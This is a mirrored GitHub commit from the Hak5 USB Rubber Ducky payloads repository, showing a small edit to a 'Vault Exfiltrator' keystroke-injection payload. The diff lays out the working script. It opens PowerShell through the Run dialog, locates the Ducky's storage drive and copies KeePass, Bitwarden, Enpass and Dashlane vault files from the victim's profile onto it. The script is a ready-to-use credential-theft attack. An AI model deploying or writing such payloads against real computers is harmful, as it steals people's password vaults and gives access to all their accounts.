mirror of
https://github.com/hak5/usbrubberducky-payloads.git
synced 2026-02-15 07:29:02 +00:00
Change label definition in Vault Exfiltrator payload
This commit is contained in:
committed by
GitHub
parent
51af366ec2
commit
7629c29742
@@ -7,12 +7,13 @@ REM Category: exfiltration
|
||||
REM Props: Hak5 Community
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
DEFINE #LABEL DUCKY
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRINGLN powershell
|
||||
DELAY 500
|
||||
STRINGLN $vol=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter
|
||||
STRINGLN $vol=(Get-Volume -FileSystemLabel '#LABEL').DriveLetter
|
||||
STRINGLN mkdir $vol':\'VAULTS\
|
||||
STRINGLN dir "$env:USERPROFILE\Documents\*.kdbx" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
|
||||
STRINGLN dir "$env:APPDATA\Bitwarden\data.json" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
|
||||
@@ -22,4 +23,4 @@ STRINGLN dir "$env:APPDATA\Sinew Software Systems Pvt Ltd\Enpass\Enpass\Vaults\*
|
||||
STRINGLN dir "$env:LOCALAPPDATA\Packages\SinewSoftwareSystems.EnpassPasswordManager_fwdy0m65qb6h2\LocalState\Vaults\*.enpassdb" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
|
||||
STRINGLN dir "$env:APPDATA\Dashlane\*.dashlane" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
|
||||
STRINGLN dir "$env:USERPROFILE\Documents\Enpass\*.enpassdb" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
|
||||
STRINGLN exit
|
||||
STRINGLN exit
|
||||
|
||||
Reference in New Issue
Block a user